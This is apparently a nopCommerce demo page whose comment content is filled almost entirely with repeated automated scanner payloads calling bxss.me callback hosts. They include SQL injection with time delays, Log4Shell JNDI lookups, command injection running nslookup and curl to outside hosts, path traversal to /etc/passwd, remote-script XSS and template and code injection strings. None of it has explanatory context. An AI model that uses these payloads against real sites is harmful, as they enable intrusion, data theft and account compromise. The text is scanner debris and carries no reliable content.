nopCommerce includes everything you need to begin your e-commerce online store. We have thought of everything and it's all included!
This is a sample comment...
555
-1 OR 2+283-283-1=0+0+0+1 --
-1 OR 2+995-995-1=0+0+0+1
-1' OR 2+75-75-1=0+0+0+1 --
-1' OR 2+382-382-1=0+0+0+1 or 'Xz8ufpqk'='
-1" OR 2+541-541-1=0+0+0+1 --
1FKR3EPCN0
${j${::-n}di:dns${::-:}${::-/}${::-/}hitufxzttesoa82502${::-.}bxss.me}zzzz${url:UTF-8:http://hittxqbpvuqey.bxss.me/}
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitspvhfxbvae28b15${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.174607-7475.174607.a0868${::-.}1${::-.}bxss.me}}
response.write(9010507*9730818)
'+response.write(9010507*9730818)+'
"+response.write(9010507*9730818)+"
<% response.write(9010507*9730818) %>
+response.write(9010507*9730818)'
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=009365&r=174607-7479&h=174607-a0868-2&"></script>
/../../../../../../../../../../windows/system32/BITSADMIN.exe
echo gxatqa$()\ xsbfbm\nz^xyu||a #' &echo gxatqa$()\ xsbfbm\nz^xyu||a #|" &echo gxatqa$()\ xsbfbm\nz^xyu||a #
&echo mhydao$()\ teeavr\nz^xyu||a #' &echo mhydao$()\ teeavr\nz^xyu||a #|" &echo mhydao$()\ teeavr\nz^xyu||a #
555&echo tiqnxd$()\ ejvwzq\nz^xyu||a #' &echo tiqnxd$()\ ejvwzq\nz^xyu||a #|" &echo tiqnxd$()\ ejvwzq\nz^xyu||a #
|echo ymlhbu$()\ tyeelp\nz^xyu||a #' |echo ymlhbu$()\ tyeelp\nz^xyu||a #|" |echo ymlhbu$()\ tyeelp\nz^xyu||a #
555|echo uslrgi$()\ rgxyfc\nz^xyu||a #' |echo uslrgi$()\ rgxyfc\nz^xyu||a #|" |echo uslrgi$()\ rgxyfc\nz^xyu||a #
(nslookup -q=cname hitbqcggbmnbb7c9ca.bxss.me||curl hitbqcggbmnbb7c9ca.bxss.me))
$(nslookup -q=cname hitdouolztdif348d4.bxss.me||curl hitdouolztdif348d4.bxss.me)
&nslookup -q=cname hitjsxxaiuurhb57c0.bxss.me&'\"`0&nslookup -q=cname hitjsxxaiuurhb57c0.bxss.me&`'
&(nslookup -q=cname hitpqmduorgqm3b038.bxss.me||curl hitpqmduorgqm3b038.bxss.me)&'\"`0&(nslookup -q=cname hitpqmduorgqm3b038.bxss.me||curl hitpqmduorgqm3b038.bxss.me)&`'
|(nslookup -q=cname hitnqbtbvudra700b4.bxss.me||curl hitnqbtbvudra700b4.bxss.me)
`(nslookup -q=cname hitvnvgpgstiu336ce.bxss.me||curl hitvnvgpgstiu336ce.bxss.me)`
;(nslookup -q=cname hithzhzaqjvvffd051.bxss.me||curl hithzhzaqjvvffd051.bxss.me)|(nslookup -q=cname hithzhzaqjvvffd051.bxss.me||curl hithzhzaqjvvffd051.bxss.me)&(nslookup -q=cname hithzhzaqjvvffd051.bxss.me||curl hithzhzaqjvvffd051.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hiteubedpfkid4384d.bxss.me||curl${IFS}hiteubedpfkid4384d.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitpeflybfvwmf4762.bxss.me||curl${IFS}hitpeflybfvwmf4762.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpeflybfvwmf4762.bxss.me||curl${IFS}hitpeflybfvwmf4762.bxss.me)&`'
wyahupqF
MyJVFnUR: ujcdtij2
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
../555
555bcc:009365.174607-7483.174607.a0868.20353.2@bxss.me
to@example.com>bcc:009365.174607-7484.174607.a0868.20353.2@bxss.me
555<esi:include src="http://bxss.me/rpb.png"/>
${9999228+9999699}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
555&n952305=v978366
)
!(()&&!|*|*|
^(#$!@#$)(()))******
'"()
555'&&sleep(27*1000)*edwmtz&&'
555"&&sleep(27*1000)*lkwovu&&"
555'||sleep(27*1000)*wbcqzj||'
555"||sleep(27*1000)*vifbmj||"
'.gethostbyname(lc('hittr'.'xemdxhocfe124.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(84).chr(118).chr(66).'
".gethostbyname(lc("hitsr"."ibkbgggpe0bdd.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(88).chr(107).chr(84)."
gethostbyname(lc('hitak'.'dydzthag1ff67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(120).chr(70)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitmplyghyuvlaf709.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitmplyghyuvlaf709."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitmplyghyuvlaf709.'+'bxss.me')+"
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(100).concat(84).concat(115).concat(66)+(require"socket"Socket.gethostbyname("hitcs"+"sabmwtayb7007.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(120).concat(78).concat(100).concat(73)+(require'socket'Socket.gethostbyname('hityr'+'aubcawrl17e82.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(114).concat(83).concat(100).concat(84)+(require'socket'Socket.gethostbyname('hitwj'+'iqevpzsm3a6b3.bxss.me.')[3].to_s)
nopcommerce-new-release
nopcommerce-new-release/.
http://hitldyqbmhfiy.bxss.me/
hitldyqbmhfiy.bxss.me
'"></style></textarea></iframe></script><iframe src="https://hitnwbwzvoifa.bxss.me"></iframe><link rel=attachment href="https://hitnwbwzvoifa.bxss.me">
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
https://karikatur.bcekmece.bel.tr/
karikatur.bcekmece.bel.tr
'"
<!--
555'"()&%<zzz><ScRiPt >bR5J(9718)</ScRiPt>
'"()&%<zzz><ScRiPt >bR5J(9421)</ScRiPt>
5559134657
bfg4417<s1﹥s2ʺs3ʹhjl4417
bfgx1134%C0%BEz1%C0%BCz2a%90bcxhjl1134
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >bR5J(9649)</ScRiPt>
555<WM9CMY>1RL2Z[!+!]</WM9CMY>
555<script>bR5J(9567)</script>
555<script>bR5J(9265)</script>9265
555<ScR<ScRiPt>IpT>bR5J(9950)</sCr<ScRiPt>IpT>
555<ScRiPt >bR5J(9460)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9114></ScRiPt>
555<isindex type=image src=1 onerror=bR5J(9806)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9698'>
555<body onload=bR5J(9118)>
555<img src=//xss.bxss.me/t/dot.gif onload=bR5J(9152)>
555<img src=xyz OnErRor=bR5J(9151)>
555<img/src=">" onerror=alert(9520)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%62%52%35%4A%289525%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\bR5J(9876)\u003C/sCripT\u003E
555<ScRiPt>bR5J(9994)</sCripT>
%F6<img zzz onmouseover=bR5J(94551) //%F6>
555<input autofocus onfocus=bR5J(9912)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(bR5J(9327))}
555G6wbw<ScRiPt >bR5J(9797)</ScRiPt>
555<WLVGUO>IXV8G[!+!]</WLVGUO>
555<ifRAme sRc=9989.com></IfRamE>
555<aJM4wUy x=9347>
555<img sRc='http://attacker-9474/log.php?
555<aadVsiJ<
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555dbkbvjjP'; waitfor delay '0:0:15' --
555wJkoU5jy'); waitfor delay '0:0:15' --
5556QxdL2Yg')); waitfor delay '0:0:15' --
555-1 OR 529=(SELECT 529 FROM PG_SLEEP(15))--
555-1) OR 861=(SELECT 861 FROM PG_SLEEP(15))--
555-1)) OR 461=(SELECT 461 FROM PG_SLEEP(15))--
555yNyyIdNh' OR 46=(SELECT 46 FROM PG_SLEEP(15))--
555ku7jno6f') OR 181=(SELECT 181 FROM PG_SLEEP(15))--
5559RsIsWhM')) OR 68=(SELECT 68 FROM PG_SLEEP(15))--
555'"()&%<zzz><ScRiPt >D7K3(9950)</ScRiPt>
'"()&%<zzz><ScRiPt >D7K3(9809)</ScRiPt>
5559141866
${j${::-n}di:dns${::-:}${::-/}${::-/}hitwwqdcrtbdg2f796${::-.}bxss.me}zzzz${url:UTF-8:http://hitheiojukvws.bxss.me/}
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hituaueeltumu05e2a${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.174607-7654.174607.a0868${::-.}1${::-.}bxss.me}}
response.write(9783715*9434922)
'+response.write(9783715*9434922)+'
"+response.write(9783715*9434922)+"
<% response.write(9783715*9434922) %>
+response.write(9783715*9434922)'
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=009365&r=174607-7657&h=174607-a0868-2&"></script>
echo kxoirq$()\ afltvg\nz^xyu||a #' &echo kxoirq$()\ afltvg\nz^xyu||a #|" &echo kxoirq$()\ afltvg\nz^xyu||a #
&echo kxoifi$()\ bgfipg\nz^xyu||a #' &echo kxoifi$()\ bgfipg\nz^xyu||a #|" &echo kxoifi$()\ bgfipg\nz^xyu||a #
555&echo kfrkcf$()\ wxxvjs\nz^xyu||a #' &echo kfrkcf$()\ wxxvjs\nz^xyu||a #|" &echo kfrkcf$()\ wxxvjs\nz^xyu||a #
|echo xwyepe$()\ xjxutb\nz^xyu||a #' |echo xwyepe$()\ xjxutb\nz^xyu||a #|" |echo xwyepe$()\ xjxutb\nz^xyu||a #
555|echo vrucaz$()\ wwqkye\nz^xyu||a #' |echo vrucaz$()\ wwqkye\nz^xyu||a #|" |echo vrucaz$()\ wwqkye\nz^xyu||a #
(nslookup -q=cname hitiqkpbhhqpq0a26e.bxss.me||curl hitiqkpbhhqpq0a26e.bxss.me))
$(nslookup -q=cname hithnlunulksq7bbf6.bxss.me||curl hithnlunulksq7bbf6.bxss.me)
&nslookup -q=cname hittjyuujearq93d2b.bxss.me&'\"`0&nslookup -q=cname hittjyuujearq93d2b.bxss.me&`'
&(nslookup -q=cname hitmawasqleus7e62d.bxss.me||curl hitmawasqleus7e62d.bxss.me)&'\"`0&(nslookup -q=cname hitmawasqleus7e62d.bxss.me||curl hitmawasqleus7e62d.bxss.me)&`'
|(nslookup -q=cname hitagrtakviitbd885.bxss.me||curl hitagrtakviitbd885.bxss.me)
`(nslookup -q=cname hittznmaixmcp81ef3.bxss.me||curl hittznmaixmcp81ef3.bxss.me)`
;(nslookup -q=cname hitqbnnqoulkzc73bc.bxss.me||curl hitqbnnqoulkzc73bc.bxss.me)|(nslookup -q=cname hitqbnnqoulkzc73bc.bxss.me||curl hitqbnnqoulkzc73bc.bxss.me)&(nslookup -q=cname hitqbnnqoulkzc73bc.bxss.me||curl hitqbnnqoulkzc73bc.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitnvqzjngljrb3a05.bxss.me||curl${IFS}hitnvqzjngljrb3a05.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitvnzxgjtyjxbde69.bxss.me||curl${IFS}hitvnzxgjtyjxbde69.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvnzxgjtyjxbde69.bxss.me||curl${IFS}hitvnzxgjtyjxbde69.bxss.me)&`'
NXvSMFRI
SaELGVBG: z2NcLWNv
555bcc:009365.174607-7660.174607.a0868.20353.2@bxss.me
to@example.com>bcc:009365.174607-7661.174607.a0868.20353.2@bxss.me
${10000493+9999943}
555&n968187=v977352
555'&&sleep(27*1000)*qebqtm&&'
555"&&sleep(27*1000)*kgvqsm&&"
555'||sleep(27*1000)*jfdgfj||'
555"||sleep(27*1000)*kelxmf||"
'.gethostbyname(lc('hitot'.'lgcrnqlg1634d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(75).chr(107).chr(84).'
".gethostbyname(lc("hityn"."lmlkqbxnc835b.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(87).chr(105).chr(81)."
gethostbyname(lc('hitmj'.'vnmvanbj93424.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(90).chr(100).chr(68)
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitdsvfyzebmz8d932.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitdsvfyzebmz8d932."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitdsvfyzebmz8d932.'+'bxss.me')+"
"+"A".concat(70-3).concat(22*4).concat(106).concat(83).concat(102).concat(86)+(require"socket"Socket.gethostbyname("hitjd"+"jbpinmaa8ac5f.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(121).concat(65).concat(110).concat(88)+(require'socket'Socket.gethostbyname('hitlf'+'zuqrzxlo8ad72.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(107).concat(75).concat(116).concat(90)+(require'socket'Socket.gethostbyname('hitkp'+'siogglts7c67d.bxss.me.')[3].to_s)
http://hitumcpwznmne.bxss.me/
hitumcpwznmne.bxss.me
'"></style></textarea></iframe></script><iframe src="https://hitwhkzngtepa.bxss.me"></iframe><link rel=attachment href="https://hitwhkzngtepa.bxss.me">
555'"()&%<zzz><ScRiPt >4wb0(9302)</ScRiPt>
'"()&%<zzz><ScRiPt >4wb0(9440)</ScRiPt>
5559793328
bfg7260<s1﹥s2ʺs3ʹhjl7260
bfgx4603%C0%BEz1%C0%BCz2a%90bcxhjl4603
555<ScRiPt >4wb0(9626)</ScRiPt>
555<WK9AIQ>FTPPQ[!+!]</WK9AIQ>
555<script>4wb0(9371)</script>
555<script>4wb0(9036)</script>9036
555<ScR<ScRiPt>IpT>4wb0(9833)</sCr<ScRiPt>IpT>
555<ScRiPt >4wb0(9322)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9490></ScRiPt>
555<isindex type=image src=1 onerror=4wb0(9012)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9482'>
555<body onload=4wb0(9758)>
555<img src=//xss.bxss.me/t/dot.gif onload=4wb0(9357)>
555<img src=xyz OnErRor=4wb0(9542)>
555<img/src=">" onerror=alert(9044)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%34%77%62%30%289186%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\4wb0(9857)\u003C/sCripT\u003E
555<ScRiPt>4wb0(9567)</sCripT>
%F6<img zzz onmouseover=4wb0(94361) //%F6>
555<input autofocus onfocus=4wb0(9554)>
555}body{zzz:Expre/**/SSion(4wb0(9560))}
5559G6Qi<ScRiPt >4wb0(9476)</ScRiPt>
555<WZ4XVB>AD7VT[!+!]</WZ4XVB>
555<ifRAme sRc=9662.com></IfRamE>
555<aT9xXP9 x=9329>
555<img sRc='http://attacker-9144/log.php?
555<ahGpLYu<
-1 OR 2+326-326-1=0+0+0+1 --
-1 OR 2+68-68-1=0+0+0+1
-1' OR 2+635-635-1=0+0+0+1 --
-1' OR 2+707-707-1=0+0+0+1 or 'nCivqA7m'='
-1" OR 2+412-412-1=0+0+0+1 --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@HnFnQ
555'"()&%<zzz><ScRiPt >wo8d(9372)</ScRiPt>
'"()&%<zzz><ScRiPt >wo8d(9651)</ScRiPt>
5559132385
${j${::-n}di:dns${::-:}${::-/}${::-/}hityenkqqqrpnbc632${::-.}bxss.me}zzzz${url:UTF-8:http://hitxniibbypye.bxss.me/}
response.write(9207848*9199668)
'+response.write(9207848*9199668)+'
"+response.write(9207848*9199668)+"
<% response.write(9207848*9199668) %>
+response.write(9207848*9199668)'
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitrjavkyqytl25bf8${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.174607-7729.174607.a0868${::-.}1${::-.}bxss.me}}
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=009365&r=174607-7731&h=174607-a0868-2&"></script>
echo ivsrat$()\ tslaan\nz^xyu||a #' &echo ivsrat$()\ tslaan\nz^xyu||a #|" &echo ivsrat$()\ tslaan\nz^xyu||a #
&echo hekdbp$()\ dhnous\nz^xyu||a #' &echo hekdbp$()\ dhnous\nz^xyu||a #|" &echo hekdbp$()\ dhnous\nz^xyu||a #
555&echo fosjtm$()\ ktdkll\nz^xyu||a #' &echo fosjtm$()\ ktdkll\nz^xyu||a #|" &echo fosjtm$()\ ktdkll\nz^xyu||a #
|echo oykitb$()\ lfctvd\nz^xyu||a #' |echo oykitb$()\ lfctvd\nz^xyu||a #|" |echo oykitb$()\ lfctvd\nz^xyu||a #
555|echo dvsudi$()\ lngmph\nz^xyu||a #' |echo dvsudi$()\ lngmph\nz^xyu||a #|" |echo dvsudi$()\ lngmph\nz^xyu||a #
(nslookup -q=cname hitcagzcvpfacd2c56.bxss.me||curl hitcagzcvpfacd2c56.bxss.me))
$(nslookup -q=cname hitardcgbyheu89724.bxss.me||curl hitardcgbyheu89724.bxss.me)
&nslookup -q=cname hitafvmwrebflf678d.bxss.me&'\"`0&nslookup -q=cname hitafvmwrebflf678d.bxss.me&`'
&(nslookup -q=cname hitcfcezjyqzm2dff5.bxss.me||curl hitcfcezjyqzm2dff5.bxss.me)&'\"`0&(nslookup -q=cname hitcfcezjyqzm2dff5.bxss.me||curl hitcfcezjyqzm2dff5.bxss.me)&`'
OL29tLcv
ShnSQ2wS: nYFaTmzJ
|(nslookup -q=cname hitkqbcxoavjb9e3a7.bxss.me||curl hitkqbcxoavjb9e3a7.bxss.me)
`(nslookup -q=cname hitekougjrovv482bd.bxss.me||curl hitekougjrovv482bd.bxss.me)`
;(nslookup -q=cname hitfuasugunpi6ede9.bxss.me||curl hitfuasugunpi6ede9.bxss.me)|(nslookup -q=cname hitfuasugunpi6ede9.bxss.me||curl hitfuasugunpi6ede9.bxss.me)&(nslookup -q=cname hitfuasugunpi6ede9.bxss.me||curl hitfuasugunpi6ede9.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitakesiwplegfa1cc.bxss.me||curl${IFS}hitakesiwplegfa1cc.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitvmdhhisuri0d8df.bxss.me||curl${IFS}hitvmdhhisuri0d8df.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvmdhhisuri0d8df.bxss.me||curl${IFS}hitvmdhhisuri0d8df.bxss.me)&`'
555bcc:009365.174607-7735.174607.a0868.20353.2@bxss.me
to@example.com>bcc:009365.174607-7736.174607.a0868.20353.2@bxss.me
${9999525+9999202}
555&n979072=v917529
555'&&sleep(27*1000)*egjhfe&&'
555"&&sleep(27*1000)*sklcov&&"
555'||sleep(27*1000)*ktfjuw||'
555"||sleep(27*1000)*bfdujo||"
'.gethostbyname(lc('hitdh'.'rhuedrxd8adf9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(69).chr(98).chr(90).'
".gethostbyname(lc("hitsf"."lgpdopunbf2d2.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(83).chr(117).chr(83)."
gethostbyname(lc('hittt'.'odwlzryi4e2b7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(86).chr(112).chr(80)
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitysdvxqldor494d7.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitysdvxqldor494d7."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitysdvxqldor494d7.'+'bxss.me')+"
"+"A".concat(70-3).concat(22*4).concat(107).concat(66).concat(105).concat(84)+(require"socket"Socket.gethostbyname("hitqb"+"hwjmtngj6c200.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(121).concat(80).concat(121).concat(69)+(require'socket'Socket.gethostbyname('hitks'+'atpybizc196af.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(118).concat(86).concat(116).concat(72)+(require'socket'Socket.gethostbyname('hitia'+'emeciqxsd2b26.bxss.me.')[3].to_s)
http://hitqjssmrklyf.bxss.me/
hitqjssmrklyf.bxss.me
'"></style></textarea></iframe></script><iframe src="https://hitqwyfbbcmao.bxss.me"></iframe><link rel=attachment href="https://hitqwyfbbcmao.bxss.me">
555'"()&%<zzz><ScRiPt >Ap0T(9366)</ScRiPt>
'"()&%<zzz><ScRiPt >Ap0T(9704)</ScRiPt>
5559519072
bfg3081<s1﹥s2ʺs3ʹhjl3081
bfgx4408%C0%BEz1%C0%BCz2a%90bcxhjl4408
555<ScRiPt >Ap0T(9482)</ScRiPt>
555<WANRK1>BD19P[!+!]</WANRK1>
555<script>Ap0T(9212)</script>
555<script>Ap0T(9349)</script>9349
555<ScR<ScRiPt>IpT>Ap0T(9268)</sCr<ScRiPt>IpT>
555<ScRiPt >Ap0T(9676)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9576></ScRiPt>
555<isindex type=image src=1 onerror=Ap0T(9709)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9668'>
555<body onload=Ap0T(9587)>
555<img src=//xss.bxss.me/t/dot.gif onload=Ap0T(9201)>
555<img src=xyz OnErRor=Ap0T(9752)>
555<img/src=">" onerror=alert(9295)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%41%70%30%54%289372%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Ap0T(9569)\u003C/sCripT\u003E
555<ScRiPt>Ap0T(9434)</sCripT>
%F6<img zzz onmouseover=Ap0T(94191) //%F6>
555<input autofocus onfocus=Ap0T(9099)>
555}body{zzz:Expre/**/SSion(Ap0T(9131))}
5553EAPw<ScRiPt >Ap0T(9489)</ScRiPt>
555<W9PAXP>AMAYM[!+!]</W9PAXP>
555<ifRAme sRc=9729.com></IfRamE>
555<aAsnPaq x=9129>
555<img sRc='http://attacker-9004/log.php?
555<an3ZSea<
-1 OR 2+604-604-1=0+0+0+1 --
-1 OR 2+974-974-1=0+0+0+1
-1' OR 2+76-76-1=0+0+0+1 --
-1' OR 2+79-79-1=0+0+0+1 or 'ELCDAqL0'='
-1" OR 2+190-190-1=0+0+0+1 --
555BoMs3EVL'; waitfor delay '0:0:15' --
555ayA2Lx0n'); waitfor delay '0:0:15' --
555LYqXi0mf')); waitfor delay '0:0:15' --
555-1 OR 964=(SELECT 964 FROM PG_SLEEP(15))--
555KHUwfuRB'; waitfor delay '0:0:15' --
555-1) OR 228=(SELECT 228 FROM PG_SLEEP(15))--
555ElgvYiPN'); waitfor delay '0:0:15' --
555-1)) OR 166=(SELECT 166 FROM PG_SLEEP(15))--
555mS47MkU4')); waitfor delay '0:0:15' --
5556D6Dd8e8' OR 100=(SELECT 100 FROM PG_SLEEP(15))--
555-1 OR 446=(SELECT 446 FROM PG_SLEEP(15))--
555nSzh42cF') OR 707=(SELECT 707 FROM PG_SLEEP(15))--
555-1) OR 51=(SELECT 51 FROM PG_SLEEP(15))--
555yVKJzVKE')) OR 737=(SELECT 737 FROM PG_SLEEP(15))--
555-1)) OR 985=(SELECT 985 FROM PG_SLEEP(15))--
555X87EOJF2' OR 733=(SELECT 733 FROM PG_SLEEP(15))--
@@cej93
555n5kbl3xB') OR 140=(SELECT 140 FROM PG_SLEEP(15))--
55588rWm1oX')) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
@@8msoW
This is a sample comment...
555
555
555
-1 OR 2+283-283-1=0+0+0+1 --
-1 OR 2+995-995-1=0+0+0+1
-1' OR 2+75-75-1=0+0+0+1 --
-1' OR 2+382-382-1=0+0+0+1 or 'Xz8ufpqk'='
-1" OR 2+541-541-1=0+0+0+1 --
1FKR3EPCN0
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitufxzttesoa82502${::-.}bxss.me}zzzz${url:UTF-8:http://hittxqbpvuqey.bxss.me/}
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitspvhfxbvae28b15${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.174607-7475.174607.a0868${::-.}1${::-.}bxss.me}}
555
555
response.write(9010507*9730818)
'+response.write(9010507*9730818)+'
"+response.write(9010507*9730818)+"
<% response.write(9010507*9730818) %>
+response.write(9010507*9730818)'
555
555
555
555
555
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=009365&r=174607-7479&h=174607-a0868-2&"></script>
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
echo gxatqa$()\ xsbfbm\nz^xyu||a #' &echo gxatqa$()\ xsbfbm\nz^xyu||a #|" &echo gxatqa$()\ xsbfbm\nz^xyu||a #
&echo mhydao$()\ teeavr\nz^xyu||a #' &echo mhydao$()\ teeavr\nz^xyu||a #|" &echo mhydao$()\ teeavr\nz^xyu||a #
555&echo tiqnxd$()\ ejvwzq\nz^xyu||a #' &echo tiqnxd$()\ ejvwzq\nz^xyu||a #|" &echo tiqnxd$()\ ejvwzq\nz^xyu||a #
|echo ymlhbu$()\ tyeelp\nz^xyu||a #' |echo ymlhbu$()\ tyeelp\nz^xyu||a #|" |echo ymlhbu$()\ tyeelp\nz^xyu||a #
555|echo uslrgi$()\ rgxyfc\nz^xyu||a #' |echo uslrgi$()\ rgxyfc\nz^xyu||a #|" |echo uslrgi$()\ rgxyfc\nz^xyu||a #
(nslookup -q=cname hitbqcggbmnbb7c9ca.bxss.me||curl hitbqcggbmnbb7c9ca.bxss.me))
$(nslookup -q=cname hitdouolztdif348d4.bxss.me||curl hitdouolztdif348d4.bxss.me)
&nslookup -q=cname hitjsxxaiuurhb57c0.bxss.me&'\"`0&nslookup -q=cname hitjsxxaiuurhb57c0.bxss.me&`'
&(nslookup -q=cname hitpqmduorgqm3b038.bxss.me||curl hitpqmduorgqm3b038.bxss.me)&'\"`0&(nslookup -q=cname hitpqmduorgqm3b038.bxss.me||curl hitpqmduorgqm3b038.bxss.me)&`'
|(nslookup -q=cname hitnqbtbvudra700b4.bxss.me||curl hitnqbtbvudra700b4.bxss.me)
`(nslookup -q=cname hitvnvgpgstiu336ce.bxss.me||curl hitvnvgpgstiu336ce.bxss.me)`
